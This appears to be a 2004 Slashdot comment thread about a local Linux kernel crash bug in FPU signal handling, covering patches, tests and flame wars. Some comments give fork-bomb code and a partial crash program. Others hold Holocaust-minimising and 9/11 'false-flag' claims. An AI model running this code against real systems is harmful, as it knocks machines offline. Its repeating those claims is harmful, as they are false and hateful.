crack smokers unite.. all too long have we been derided as ignorant burntout freaks.. by people who dont undesrtand us.. we have made much progress since the 80s and have a great new gui too..
Crash occurs without syscalls.
Crash happens on all machines, but only locks up one CPU at a time on SMP.
Crash occurs with any signal, also on return from exec syscall.
Crash occurs only on x86 and x86_64.
read.
YHBT = "You have been trolled"
YHL = "You have lost"
HAND = "Have a nice day"
ROTFLMAO = "Rotten floor mayo"
HTH
author just did a copy and paste from:
9 Yj YJ:dbforums.com/arch/88/2002/7/364963+Admiral+Taco ++linus&hl=en
http://www.google.com.au/search?q=cache:_X9ocw-
Don't worry, and run up2date/yum/apt-get or update tool of your choice. For all I know, my box could already be fixed and I don't know it yet.
Recompiles are for people who are really on the bleeding edge. The equivalent would be on some priviliged hotfix service with Microsoft. If you keep up with your distro's fixes you'll be at least as safe as with MS update, and just as easy.
Kjella
Live today, because you never know what tomorrow brings
Two words for people like you...
SUNLIGHT VIRGIN.
Question for the kernel gurus out there -- I read the article and the patch (so sue me), and it seems to me that the patch just redirects the signal-handler flow if sig==8.
This may well protect against the example exploit, but what happens if you get a floating-point exception in the handler for some other signal?
The provided patch does not look like a real fix, unless the deeper bug really does just involve sig==8.
2*3*3*3*3*11*251
LOL!!....what a fucktard.
It was a joke.
As I said to another moron who missed it, you are a SUNLIGHT VIRGIN. Interaction with things other than that humming box lets you get things like this. Trust me, even though the sun is bright and hot, it won't hurt you.
my sig's at the bottom of the page.
int main(int argc, char **argv)
{
while(1) {
fork();
}
return 0;
}
JET Program: see Japan, meet intere
Fuck the GUI
Right now, any semi-current linux setup is a sitting duck for this kind of DOS attack. It will stay this way, until some programmer sends the maintainers a patch, and the maintainers release it as a new version (and the distributions make it available to their users). I'm guessing there is a minimum three days for all of this to come about, and I'm sure not seeing a fix on kernel.org right now. Sure you need a shell to run the DOS exploit, BUT do you really think crackers aren't working on a remote version right now?
With commercial vendors, convention among the white hat hackers is to inform the vendors, and agree to a non-disclosure period (3 months?) before making the security hole public. That is certainly a preferable method than leaving thousands of linux machines vulnerable right now.
Perhaps Linus could assign a volunteer for the development and stable kernels to act as "security" maintainer. Ethical hackers could report the details to them, the security officer can contact the developers that have their code affected. Between them and whatever volunteers they can discreetly ask for help could code a fix, test it, and then have it merged/released into the official trees as a security fix. This would minimize the sitting duck situation. Even if Linus decides not to implement this, it should be done at every commercial distributor. They tend to release their own tweaked kernels anyway, and it would be a service to their customers. Plus, they can inform their customers to update, and let the information wreak havoc with their competitors (until they implement and distribute a fix).
There is no America. There is no democracy. There is only IBM and AT&T and DuPont, Dow, General Electric, and Exxon
Love that troll.
Idiots write slow C code- Java and C# will always be slower. As they are written with C how can they be faster? The benefit of Java and C#, is that they make idiots' code run faster than it normally would.
Is this the stolen code that SCO's been complaining about?
I'm only paranoid because everyone is against me...
For instance, it is in fact a standard troll technique to call Linus Norwegian/Swedish/Danish/whatever, anyway. So, if this is indeed a "masterstroke" arising from the events you describe, it is still indistinguisable from a real troll.
Or, am I smoking crack?
To have a right to do a thing is not at all the same as to be right in doing it
The update may be avaliable faster than Windows, but you cannot say that it is /easier/ to apply than a Windows patch. I hate recompiling my kernel, it always takes me a number of attempts until everything works. Also my server is running Linux and is serving two houses of people with net access, I can't just take it down and mess around with it for hours while I have fun trying to get a working kernel. So regardless of when the patch was released I still need to wait until later tonight to apply the patch.
I spent ages trying to think of sig, but never did
For a moment I thought you were serious, as I read the first 2 lines of your post ... I felt this venom building up inside me. They I saw, you thread was maked funny. What a relief.
This is just a random idea, and I'm sure y'all will have plenty of ways to shoot it down, but maybe we need at least some sort of base level of certification so that we can decide whether or not to accept packets or e-mails from a given machine. It sounds dangerously similar to trusted computing, but we do need to ensure that people (switching metaphors mid-post) driving on our information superhighway have a minimally safe vehicle, at least so that they don't go crashing into everyone else.
How could this be done? Maybe my machine runs some quick security checks on your machine whenever you try to connect to mine. Or I trust someone else's word about whether your machine at least meets the minimum safety standards. Let this never let anyone fall into a false sense of security just because that minimum level is met. And that minimum level should change as new threats emerge. But it would reduce the penalty that the whole driving population pays for the mistakes of one subset. That subset would have to at the very least get their license or we could shut them out of driving near us.
So who is serious enough about security to want this patched, but stupid enough to just accept a patch from any of thousands of developers? Yes you could evaluate the source of each patch and recompile using th new code, but who has time for that? Open Source and proprietary software are no different in terms of patches. If you don't get it straight from the horse's mouth then you are not following very good security procedure.
After all, doesn't anyone remember this? You can find open source patches for proprietary software every once in a while too, but you would be nuts to trust them.
So if I run this exploint in a user-mode-linux instance, do I crash the UML or does it get the host OS also?
Lessons learned: (1) use Linux and keep it up-to-date with apt-get; (2) in the games partition which runs windows, *never* patch anything.
'cos not a single one of you muppets can even write the equivilent of Hello World and get it right.
#include <stdio.h>
#include <stdlib.h>
int main( int argc, char *argv[] ){
int r;
r = printf("I love C\n");
if( r ){
r = EXIT_FAILURE;
}else{
r = EXIT_SUCCESS;
}
return r;
}
Yeah, right.
Join us. There are clowns and ballons, and clowns with ballons and everything down here! It's great, you'll love it. They always do, we make sure of it!
Every system has bugs. I'm just pleased that this bug was noticed and handled so quickly and efficiently. And I'm no guru but from my understanding you have to want to break the kernel by issuing compiling and executing code such as this... Heck, I can crash MS XP Pro by simply running IE. :P
Some people are pedantic about these sorts of things. Personally my only spelling pet peeve is seeing people use 'alot'.
*shrug*
If you maintain a Linux system for a larger group of people, you should know what you are doing. Pardon me, but obviously you're not. .config from 2.6.4, then answering a few questions for new options) brain involved: 1%, well documented in case of doubt. ../kernel....: 10 seconds, brain involved: 0%. :P
...
As soon as I read this I upgraded our Firewall at work. I downloaded the latest 2.6, got the patch from the bottom of the linuxreviews site. That took about 4 minutes on a somewhat fast internet connection.
Extracting the Kernel and patching it: 1 minute, brain involved: none (patch howto on that page as well, besides, if you are a real sysadmin you'll be able do kernel patches single fingered).
Configuring the kernel: 1 minute as well, using make oldconfig (porting over my
Compiling: make-kpkg kernel_image: 10 minutes, brain involved: 0%.
Installing: dpkg -i
Rebooting: about 1.5 minutes, brain involved: how fecking hard can it be to type 'shutdown -r now' ? or maybe even 'reboot'
This also answers the other posting where somebody was whining about making the updates moronproof... Most distros have this 'feature', autoupdating, Redhat: up2date, Debian: apt (through security.debian.org),
No. Check perlfaq1(1) for the whole story.
:wq
Gee, I remember when programs intentionally written to crash the OS were simply considered lame not security exploits?
Or have they been grasping at straws lately trying to come up with linux exploits so they decided to make this sound a bit more grand?
I can write one for Windows, MacOS, Linux, etc etc etc for eternity. Hell on most OS's simply using enough memory will do it.
There are easier ways, how about pressing the power button? or perhaps ctrl+alt+delete. Yup, uber security exploit which takes down the system, allows no code execution or priv escalation, gives absolutely no access to anything the user shouldn't have access to and will result in immediate termination of his account when you do a process audit... just like doing the same thing a million other ways will.
Give them a compiler and they can bring down the system, each time every time, ANY system. But I'd hardly call that an exploit.
If you have the habit of leaving the machine on for extended periods, you will not receive notification of new updates until you cycle power (possibly log out and back in too...). Lots of Wusers do this (leave their computer on), which may leave them thinking they are well protected when in fact their machines may need urgent patching.
Is it specific to /. the lack of humor in the answers to this post...
Don't seeing the humor here is hard...
I consider myself to be very technically inclined having programmed in VB for the last 8 years doing kernel level programming...
The above non-sequiter bit of hilarity says it all...I can just imagine it : "I've written an OS in VB and compiled it, saved it to a floppy and booted it."
OK, replying to myself, did some digging on LKML and found this.
Disclaimer: I have not personally tried either fix, but the second one (which modifies the "clear fpu" macro in the i387 header file) looks like a more appropriate fix to me.
The provided patch is for the 2.4.27-pre5 kernel, but my 2.4.26 "i387.h" file was the same, the patch can be applied. (Again, haven't tested it yet, don't know if it works.)
2*3*3*3*3*11*251
You know, I was going to try to jab you for fun, and post "Yeah, that bugs me alot too." I typed it several times, and cleared it out. Seeing that awful "word" bugs me so much I can't even have a little fun at your expense with it! How's that for crazy?
There are 1,001 ways to crash a linux kernel with access to a shell.
Save some keystrokes and give:
for(;;)
{
malloc(1);
fork();
}
a try.
... yeah, that really gets me alot of the time too !
It's people like you that are holding Linux back and out of the desktop market. You cannot assume that everyone who wants to use linux must be able to know how to recompile a kernel or even how to compile any progem. If Microsoft issued updates like this how many in their user-base would be able to apply it, no matter how many HOWTOs there were.
/more/ people running linux?
I use linux because its stable and does what I want it to, including traffic shaping. I CAN apply patches to the kernel and know how to recompile it. But that does not mean I am an expert at it. Of course, what was I thinking, If I am to use linux then I must be an expert, screw the learning curve I should know it all in 5mins!!
With that attitude how is anyone EVER going to move over to Linux, what about the person that installed linux yesterday to give it a try, are they supposed to know how all this works? I am a student and the houses I serve the internet to are my mates, we had Windows2003 server for a while but it didn't have any traffic shaping. Students tend to love running P2P and sucking bandwidth, so I switched to ClarkConnect and setup a traffic shaping script.
I am sorry for not being as L33T as you, I crumble in your presence. Oh, and thank you for pointing out how much more effort this patch requires than clicking "INSTALL" when windows pops up the dialog asking if you wish to install that update that it automatically downloaded for you, or even the update that it automatically installed for you if you have that option checked.
You completly ignored the whole point of my post and banged on about how I shouldn't be running linux if I can't do xyz, maybe I'll switch back to Win2K3 in that case, I mean, why would you want
kthxbye
I spent ages trying to think of sig, but never did
First, C is as fast as you program it to be. I generally consider C++ as bloated. Java as overkill and C# as one of the most dirty languages I have ever seen. (The error handling, for example). VB is not programming, and considering basic is at lot more ancient than C.
Granted, this crashme program, which requires local shell access, does seem to work in some cases.
However, it does not do so on suse linux 9.1 - it creates an unkillable process, but the system continues to run normally.
At least pure 2.6.5 from kernel.org running on P4 2GHz.
They were the ones who paid someone to code this exploit.
if you steal from one source, that is plagiarism, if you steal from many, well, that's just research.
The fix is available here.
Oh common! After all the crap we get from Linux users every time an exploit is found in Windows, you have to expect that were going to give you guys some shit when it happens to you, primarliy because it doesn't happen that often.
So there it is, flame away :-)
Yes, you have to recompile your kernel. But it really is not that big a deal (all the same, I wouldn't do it on a machine in co-lo without an already-established phone line to a person standing in front of the box}.
.config file will work for the new kernel -- and if not, it probably is time to upgrade anyway.
Think of the kernel as just another tarball, which has a slightly weirdy make procedure {like, you can't just go 'make install'}. You have to download the kernel sources from a kernel.org mirror, your distribution's kernel patches from one of their mirrors {while Slackware users point and laugh}, and the local exploit patches from the site mentioned in the article.
If you use KDE, there is already a graphical kernel configurator known to work with 2.4 series kernels -- it may not work properly with 2.6 series kernels, but there probably is a patch.
Otherwise, apply your distribution's kernel patches (if any) as per their instructions, followed by the article patch. Then carry on with your distribution's instructions. If you're really lucky, your old
And don't be put off by the rumours that you can trash your box this way. The worst that can happen is you forget to run LILO and have to boot from a CD-ROM. You can then run LILO and reboot. {Actually that's not true. The worst that can happen is you do run LILO as you meant, but you had incorrectly jumpered both drives on the primary IDE controller as masters when you meant cable select, and you stomp all over the bootloader and kernel on the "slave" drive. Trust me, you do NOT want to do that. Was a 'mare to get sorted and I ended up losing the partition I was trying to rescue because I made a brain-fart.}
Je fume. Tu fumes. Nous fûmes!
The same cannot be said of many proprietary OSes...
(Reposted, account some asshole moderating it as "troll")
I see comments about how it only took a few days for the open source community to respond to this bug. In a comment made by Ayanami Rei, an article is linked that is dated December 12, 2003 that details this problem. Isn't that a 6-month response time to this issue? It would appear that Linux is subject to the same patching issues as MS is, even though the reasons are a bit different.
2.5.42 gives floating point exception, at least as non-root
./evil-crashme ........*............*Floating point exception
-@ip6ctrl:~/scripts$ gcc evil.c -o evil-crashme
-@ip6ctrl:~/scripts$ ls
dropall.sql evil-crashme evil.c truncate.sql
-@ip6ctrl:~/scripts$
-@ip6ctrl:~/scripts$ uname -a
Linux ip6ctrl 2.5.42 #1 Wed Aug 6 13:46:27 EDT 2003 i686 unknown
- Sig
#include
#include
#include
static void Handler(int ignore)
{
char fpubuf[108];
write(2, "*", 1);
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, Handler);
spec.it_interval.tv_sec=0;
spec.it_interval.tv_usec=100;
spec.it_value.tv_sec=0;
spec.it_value.tv_usec=100;
setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
by simply commenting out the inline assembly, i fixed crash.c so it can no longer crash Linux!
1 2 1 2 THE NAKEN CREW
by typing:
at the bash-prompt :-)
ref.url : http://forums.gentoo.org/viewtopic.php?t=67302
I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
You completely ignored my point as well :P
I was trying to say that if you administrate a network you need to know what to do in order to maintain it.
You are obviously more advanced than Joe Doe, yet you complain about your daily (weekly?) bread, that's what I was getting to.
And, as I shortly mentioned before, there IS a solution for the average user who just installed Linux yesterday. Apt/Up2date/Emerge/and whatever their names are.
It is also not about being cool, those are simple tasks that at least people who are willing to look into things can understand.
In simple words:
(Corporate) Administrators, who need to apply patches within days/hours should know what they are doing, so they can do it efficiently and fast without having to rely on external help. Home users can wait until patches and updates hit the official distribution channels for their distro.
*opsi*
I don't claim I know more than I know, and if you know you know more than I know, then by all means, let me know.
Thanks for the info.
In the near future, I want to use SUSE 9.1. Their YAST tool supposedly helps automate security updates.
Excuse my ignorance (anyone who wants to respond), but do I use YAST to
get the kernel update and then recompile?
How am I supposed to keep up with this stuff?
My beliefs do not require that you agree with them.
Finally something funny and it gets modded troll!!! "the Microsoft "shared source" program seems to offer all of the same freedoms as the GPL." Come on that is funny stuff.
He didn't say he was running a corporate network, he said he was running a network for a few houses. He IS a home user with a shared server so before you jump down his throat, why don't you read a little and figure out just what he is trying to say?
I agree that user should be capable of updating their systems, if they can't then the system needs to do it for them. The problem is that if you are running a custom Linux or you've changed something somwhere, update tools like apt and Emerge can go totally wrong. I've never seen this issue with Windows, I guess this is the price we pay for having an Operating System that is so customisable, it breaks compatability and standards too easily.
I spent ages trying to think of sig, but never did
stop making sense please.
ogm liek dont use linux it si hax0red! linux sux0rz!!!!!111
Oh, when Linux has a vulnerablity, its swept under the rug. Windows is blasted by so called "hackers" or somesuch. Bloody hell. Every bit of software has its vulnerablities, its written by man for goodness' sake
It's called sarcasm you stupid piece of shit
That revolver must have like a million barrels.
First off, I'll go ahead and agree with that statement! This could be nothing more than a greater amount of attention being paid Linux every year - or it could be that the increasing commercialization of linux is taking it away from its more stable roots. Either way, it's disconcerting.
Windows kernel had in the last 12 months? I am afraid that this comparison might fall out to the advantage of Windows.
It's hard to compare - studies I've seen (can't remember where, or I'd link) suggests that the overall bug rate in the two codebases is similar, but that linux generally tends to pay more attention to critical areas (this exploit notwithstanding).
Until you take into account time to fix, maybe
Now that's part of the critical bit. Not to mention which the Windows platform has a number of bugs that can be inflicted 1) remotely, and 2) without user access. Because windows does such a poor job protecting resources at the port level, it means that no human intervention is in any way required to propagate an exploit. Thus, while kiddies may attack individual linux machines, they can release exploits that can ultimately affect an unlimited number of windows machines. That's the real problem, the exponential nature of windows exploits.
Great way to start of the week. Funny as hell obviously satirical post followed by the inevitable clueless replies thinking it's real followed by vain attempts to educate the clueless in the ways of sarcasm and irony. Ah the eternal dance of Slashdot poster and postee. BTW, this guy has some great ideas as well.
If the user has access for a custom procmailrc that can count as shell access but few people realise this.
Sam
blog.sam.liddicott.com
Tested their code on Redhat ES 3.0 with all current updates applied (2.4.21-15.ELsmp - they haven't released any new kernel updates specific to this problem). The process will suck up a cpu spinning in a tight loop, and is unkillable (even as root with kill -9), but it does not crash the system.
Redhat seems to have different code in signal.c around the area the signal.c patch mentions, but does not have the i387.h patch.
11*43+456^2
That whooshing sound is the joke going over your head.
My beliefs do not require that you agree with them.
Brilliant writing style, elaborate sentences with excellent spelling. Subtle light style actually requiring to read the comment to recognize its intention. Vintage Adequacy-grade stuff.
Ada95 is blazing compared to C... All that runtime type constraint checking picks things up a bit...And its new.. the 95 stands for 2095 er.. I mean 1995, so its spiffy newness means greatness. It even has socket support in GCC now so....
Seriously though, its really hard to write bug free C code. Maybe changing languages isn't such a bad idea to think about.
I find it interesting that the treatment of exploits is so different between Windows and Linux. If it's a Windows exploit, the tone is "see how bad Microsoft is...". If it's a Linux vulnerability, the tone is "open source is so wonderful". An exploit is an exploit regardless of the vendor or development process...
So...from the article.
Using this exploit to crash Linux systems requires the (ab)user to have shell access. The program works on any normal user account, root access is not required.
This is bad considering how many *nix systems have telnet open on the outside. It also posts the code to crash with on the website. Any idiot can cut & paste it & compile with gcc.
The exploit was reported as gcc bug 15905 2004-06-09.
Wow a story posted within 5 days on slashdot. I'm impressed. Usually everyone knows about an exploit and its patched before we get to MS bash while *nix has a hole. FYI patches are listed on the site if you read the article. I'm interested to know how many used them.
Two roads diverged in a wood, and I - I took the one the bus load of girls just went down.
Linux has failed you. Where's your God now nerds? Where's your god now?
Your sysadmin needs that advice and your production server has 958 users.
You'll never catch me alive ...
Hey! You forgot to mention where the "x" in "linux" came from! And what happened to your "linux worm"? And the rest of your GPL fud ?
It easy, just put aside your objectivity and strap on your /. tinfoil hat and have at it.
My test was on a dual P4 (hyperthreading). Running a single instance of the code only locked a single cpu. I just played with it again, and running 4 instances locked the box. So RHEL3 is vulnerable, and a correct description of the problem is that the exploit locks up 1 cpu in an endless loop that cannot be stopped. For systems with multiple CPUs, you have to do this once for each cpu (twice for each physical cpu if hyperthreading) in order to lock the whole box up.
11*43+456^2
My life's goal is to get a score of +3!
Unless you get hurled into it.
My only political goal is to see to it that no political party achieves its goals.
You really need to be on the look out for signs that a post is intended to be taken humorously before you write a long refutation of said post.
But it is funny! Why should something get modded as troll just because some people don't get the joke?
Why not use a tool like crashme to find them?
PHEM - party like it's 1997-2003!
Who modded this funny? This is older than dirt.
love is just extroverted narcissism
and so is Solaris...
As someone who has been doing sys admin on Solaris for 7 years, and has messed around a bit with Linux for the last 10, I've always wondered about maintaining Linux on a production system with respect to patches. I realise that there are many distros but if it is the case that you need to recompile code to patch the kernel then that is just not good enough any more. Making, compiling or linking has ever been a part of kernel patching in my experience and if Linux is to be used on large SMP boxes, let alone desktops, everyone involved is going to have to work to make patching the kernel as slick, and generally trouble-free, as it is on Solaris Yes, I know it can be a nightmare on Solaris sometimes too but generally it just works. Yes, I know this is partly because Solaris is propritary and it's easier for Sun but the point still stands. Everything that can be done to make kernel patching easy should be done.
Saying it's OK as is because you need to know what you are doing sounds very hollow indeed.
ooooooo, burned!
That's right. All your base.
Hackers who have secret shell access are not going to crash the machine. That would be stupid, they would probably lose whatever they did to get the secret shell access, and lose the ability to mess with the machine or to use it to get into other machines, or use it to spew spam.
This is really only a problem for a system that provides shell accounts (or another way to run arbitrary software) remotely to normal users. Such a system is pretty insecure anyway. You can easily run software on Linux that will eat all the process time and make it so difficult to kill the runaway process that the machine might as well have crashed.
http://linux.bkbits.net:8080/linux-2.5/diffs/inclu de/asm-i386/i387.h@1.16?nav=index.html|src/.|src/i nclude|src/include/asm-i386|hist/include/asm-i386/ i387.h
Not to prey on someone elses excelent post, but he forgot to mention VB.net's full domain name support, which is obviously lacking in the Linux C kernel.
Until Linux C gets full domain name support, it will be substandard as a networking language.
I think you underestimate just how much I just dont care.
The *first* post I see is some bullshit lauding the superiority of the opensource development process with this as an example. RTFA. Here is some sensible info and advice.
1. There *was no patch*. Some systems were immune, but that was completely by chance.
2. There is a patch *now*, but the article also says people are already using the thing to crash free shell providers on day 0.
3. The patch, at this point, requires a kernel recompile. Not everyone running linux knows how to do that. Many who do are too lazy. Don't give me some shit about how everyone running linux is so 1337 that they will be sure the have already patched their system. I know you. You aren't that 1337.
4. Yes, this *is* a big deal. We were caught with our pants down, plain and simple. This *is* worse than any windows security issue that has come up in a long time.
5. Please *do* compile the demo code against your system and test it. If your system crashes, please patch. Don't act like many and just ignore this, especially if you are running a server or anything that stays connected for any amount of time. It also might be a good idea to turn off your telnet and ssh daemon (yes, even ssh) until you patch.
6. If you are *not* running linux or not running on x86, it might also be a good idea to test the demo code against your system. If you are running windows, some versions of windows *do* support possix to a limited degree. The code *might* compile. Then there is also, cygwin. This is probably a bug specific to linux x86, but it won't hurt to check.
If you don't believe me, post a few public IP addresses of your corporate network and see how many new friends you make.
I'm guessing alot of people could use the extra disk space.
ZZ
Right. The only thing that might help is to use a noexec mount option while mounting the filesystems the untrusted users have write access to.
And, oh, I haven't seen one Slashdot know-it-all post a link to the correct patch (not the one which merely stops the example code posted) for the problem.
Kida these days. Has Debian made it so people don't know how to edit a lilo.conf anymore?
Not really, just about any newbie distro (Fedora, Mandrake, SuSE), pushes pre-compiled kernels to usesrs so all they have to do is update the system, and reboot. If they were compiling their own kernel well they should know what do to do.
When I found my lame parody of a website on the first page on Slashdot I instantly begged two nice people, igu and dvl666stn, to help me with the load. The site now has 3 A records all pointing to high bandwidth locations. The AAAA record for Ipv6 is pointed at yet another location. I assume the main URL can handle the current and even more load. The sites listed at mirrors on the first page would probably not be able to handle the current load on their own, as these URLs are not load balanced.
9/11: Never forget it was a false-flag operation
On the other hand, if your post is modded as interesting, I will not be relieved.
yep
Which should be spelled "could've", and would seem to be as legitimate of a contraction as any in casual speech.
Trust me, even though the sun is bright and hot, it won't hurt you
So you say, I know otherwise. As a fair skinned person who once had SECOND DEGREE sunburns... I know just how much hurt the sun can inflict.
Help Brendan pay off his student loans
sudo yum -y update kernel*
is pretty easy.
Here's the email I got from Red Hat:
Fedora Update Notification
FEDORA-2004-171
2004-06-14
Product : Fedora Core 2
Name : kernel
Version : 2.6.6
Release : 1.435
Summary : The Linux kernel (the core of the Linux operating system)
Description :
The kernel package contains the Linux kernel (vmlinuz), the core of any Linux operating system. The kernel handles the basic functions of the operating system: memory allocation, process allocation, device input and output, etc.
This update includes a fix for the local DoS as described in http://linuxreviews.org/news/2004-06-11_kernel_cra sh/index.html
...
If you were smoking crack you might understand that "troll parody" is meant to refer to a "parody posted by a troll" rather than a "parody of a troll."
This is not a DOS attack.
Roses are #FF0000, violets are #0000FF, all my base are belong to you
I actualy removed rxvt from the GUI menu, no more risk from ignorant X users :D
;)
If I want a terminal, Ill use that hidden hot key combination
If someone discovered a block of code that can crash a Windows system, it wouldn't even make the news. It's much harder to write C code that doesn't crash Windows.
Not Found
The requested URL
Give credit where credit is due, this troll was stolen from eggtroll originally posted here.
You're kidding, right? An easy argument could be made about how biased this site is. "Microsoft Violates Human Rights In China" is a past article that comes to mind...
Some are saying that this is worse than anything they've seen in Windows.
Uh?
What about
I wont go into the subject of worms/viruses.
But here we have a C-program that needs to compiled first and then executed!
It's an assembly-like infinite loop with a vengeance:
In my machine!
First you have to get inside MY machine to compile this.
while(1){do crap
Man, I could write 100 similar infinite-loop programs in C for Window that would freeze all the same!!!!!! and do REAL damage as I have root priviledges !!!
In Windows we had a fucking sound wave that CRASH a SERVER!!!
Anyway lets compile the code?
Lets crash my system? (here we go - I did this: system freezes)
Now lets go for a CLEAN reboot?:
Can Windows XP/NT do that? In case of a Disaster?
Enlighten me - I am no XP-NT-Admin. My guesses are you will have to cross your fingers and reach for the reset button.
A self-spreading virus for Linux running of a kernel - now THAT would be SERIOUS news.
Nevertheless I will patch it just for fun.
See this -> http://linux.bkbits.net:8080/linux-2.5/diffs/inclu de/asm-i386/i387.h@1.16?nav=index.html|src/.|src/i nclude|src/include
For the longest time, you could get full root access to any local Linux machine without needing a password just by passing the right command parameter to the LILO prompt.
Nothing is perfect. I don't care how many fanboys from either side try to convince me otherwise. Operating systems are not religions, they're fucking software made by humans.
Windows patch released:
"Stupid M$, now I have to reboot my Windows machine for a whole entire minute of downtime. My IT department will have to spend three months 'testing' this patch first, meanwhile allowing all the exploits in the wild to infect our network. Stupid Micro$loth sluts."
Linux patch released:
"This is just more evidence of the power and flexibility of Open Source Software. The patch is already released, and I'm recompiling my entire kernel on the production server and rebooting now. OSS is so much better than M$."
Since no one but I can asscess my Linux computers and that reside behind a firewall I am not going to to a damm thing. This is like no BFD to me. How many people need to provide anyone remote shell access to their personal systems?
If you have a systems that does provide remote shell access you better get that recompile going. Other wise it must be a slow ass news day.
If you don't like what I write don't be a CS and mod it down. Refute it.
Yea I can't spell. So what is your point?
Only if you restrict your definition of 'nonzero' to that in game theory, not that which is in wide use in engineering, physics and mathematics. And I wasn't discussing game theory at all. The more general meaning of the word 'nonzero' is "that which is not zero". Which is indeed what the etymology of the word would apply
I was using the term in a sociological context, bub. BTW, since you're so well versed in engineering and it's terminology I'm sure you know that all computers built since the dawn of time (computing) to this day are said to use a "Von Neumann architecture"? Von Neumann was a mathematical genius, the father of the modern computational model and the original pioneer of game theory.
Quod scripsi, scripsi.
Don't listen to those other ones... they're crazy.
THIS THING CAN TURN ON A DIME, MACROSSZERO STYLE ALSO FUCK BETA, ~NYORON
Right... and Stallman will call VB GNU/VB since then...
Thats why you password protect LILO... well there goes your excuse for an arguement.
For the longest time? You still can.
It's not a bug, it's a desirable feature.
s/fwait/fnclex/ in clear_fpu of include/asm-i386/i387.h.
This prevents you from being vulnerable.
He was joking... I wasn't sure till the very end (even then I wasn't totally)
For Linux, choice of:
I'd like to see a TwoKernelMonte variant for SMP which allowed you to isolate one processor from the kernel, bring up a patched version of the same kernel under it in cooperation with the running kernel (which process would presumably not survive any changes in in-memory structures, so check for that first), migrating devices across in idle moments, then finally deleting the old kernel and bonding the processor thus freed to the new kernel. Viola, new kernel sans reboot. Ideal for a patching situation.
Got time? Spend some of it coding or testing
The Roman Catholic Church appears to have been provably responsible for at least 60 million deaths so far (probably over double that in real life; for example, records of the Goan Inquisition are very thin on the ground and it accounted for over a million all by itself; for another example, they sic'd the Manchu onto 70 million Ti Ping and haven't been called to account for that) but even this pales into insignificance compare with the great Atheist murderers like Stalin and Mao.
Not that it matters to the million or two who were actually killed, but six million is also an unsupportable number pulled out of someone's backside. Hitler was an amateur. He used the Jesuits and the Roman Catholic heriarchy as a model for his Third Reich (if there is a Catholic equivalent to SCO, his estate is in big trouble), and was still a Catholic in good standing when he died, despite having a fairly heavy obsession with the occult.
You do have to wonder about the mindset of the underlings who carried out all of this mayhem.
Yeah, I posted before really taking the time to figure it out, it seemed really similar to another troll from somewhere else. He did a great job with it though! LOL
Create a container file with UDF (64M worked for me). Mount it on loopback, and copy some large directory to it. Will lock the kernel up in no time.
But both of these require root privileges, typically. A crash bug that doesn't is much worse.
I love C++
This ancient troll-text *is* funny today... the kernel is written in C... there's a bug... get it? The luser responses are priceless too!
You mean we'll never be certain that we caught you. Or that you're alive. Depends how close you were to Schroedinger's cat...
Time is Nature's way of keeping everything from happening at once... the bitch.
I have coded in VB for fifteen years, and in Java for over ten
Hehe .. Java of course came out in '95 ... Anyway, I remember back in '98 I was reading the jobs section of a newspaper, and remember laughing at one company's ad: they were looking for Java programmers, and required that applicants had a minimum of five years Java programming experience.
Yeah, technically, its not a DOS attack. But when the machine locks up/crashes, it pretty much the same result, no?
There is no America. There is no democracy. There is only IBM and AT&T and DuPont, Dow, General Electric, and Exxon
No, it becomes a serious problem when someone figures out a way to trigger the attack without the direct need for a command shell. (worm/trojan, for example.)
Presume there is a bug can be triggered a lockup/crash remotely. The gist of my post still applies, no?
There is no America. There is no democracy. There is only IBM and AT&T and DuPont, Dow, General Electric, and Exxon
Yes if somebody can get arbitrary code to execute, they could execute this and thus crash the machine. However I still feel that if somebody can get arbitrary code to execute, they could instead give themselves a shell (from which they could execute this bug and many others), or execute much more destructive code such as deleting files.
It does seem the main threat is that even a total novice who has a shell account can probably figure out how to crash a machine. This is a threat to universities providing rlogin and some similar stuff, but probably not to a lot of servers.
Linux trolls got it all wrong. Windows don't suck, it blows.
1f u c4n r34d th1s u r34lly n33d t0 g37 l41d
So, for signaling, fast call gate in the IDT is more dangerous than slow switching task in the IDT :P
open4free ©
For once I'm more secure with my anicent 2.4.18 kernel!
Those who won't learn from history are doomed to repeat it, including you.
Not everyone who pounds on Microsoft's character is doing it by reflex. The company as such, following the character of its fearless leader, is actually as amoral as it is so often painted - and that's only the greed and carelessness we actually know about because it's been made public; what about the other skeletons in their closet?
Linux is not a panacea, although it does everything I personally need and more, but it is being adopted in far too many places simply because it's ABM (Anything But Microsoft).
Got time? Spend some of it coding or testing
I can say "BOOBIES" without the use of a calculator!
YHBT. YHL. HAND.
Love,
bonch (aka Overly Critical Guy)
Really, you can't be that blind, can you?
There's nothing wrong with "could've". The point is that illiterate people hear and say that, don't realize it's actually a contraction, and proceed to write "could of".
So what? Why do we want Linux to 'move into the desktop market'?
I personally want it to stay where it is. (Or maybe was a couple years back.) It's for experts. It's a GOOD thing that the unwashed masses have their Windows, and the expert geeks have their Linux. We don't Linux to get dumbed down until it's Windows do we? It won't be any better than Windows if it does.
Health is simply dying at the slowest rate possible.
You're right. There is no cure for stupidity as profound as yours.
there you're crashing user-space and root still has 10% resources alloted to be able to log in and nuke the mischeveous lamer.
:chaos
here OTOH you have a simple non-root exploit that effectively denies root or anyone else for that matter any kind of access.
this exploit basically takes us back to the days of DOS when you could
JMP chaos
and crash the PC
I thought it was pretty funny myself
It's good reading for anybody interested, however, unlike slashdot, registration is required.
/., allowing the trolls to post via Anonymous Coward serves a useful purpose. They get to blow off steam (or get off), and with the ability to auto-score them down in my profile, they don't bother me much.
/. balances it out with a partially-broken moderation system.
Completely off-topic... but are you saying registration-required is a good thing?
On
But then,
Wolde you bothe eate your cake, and have your cake?
I hate recompiling my kernel, it always takes me a number of attempts until everything works. Also my server is running Linux and is serving two houses of people with net access, I can't just take it down and mess around with it for hours while I have fun trying to get a working kernel.
/boggle
You have to take the machine down while you compile a new kernel?
Even a user-hostile distro like Gentoo allows you to compile a new kernel while the machine is still running, install the new kernel into a new slot in the boot partition (leaving the old kernel intact and bootable), and finally change grub to boot from the new kernel (leaving yourself a 30 second timeout on the kernel selection screen, in case you need to revert back).
Changing a kernel is easy. Especially if you're smart enough to keep good notes about what settings you used last time (or just make a simple copy of the config file).
Worst case, if it doesn't boot, is that you boot back to the old kernel while you re-examine what you did wrong while creating the new kernel files.
6/11/2004 hasn't happened yet. It's only June now and the 6th of November is far enough away we can plan for this!
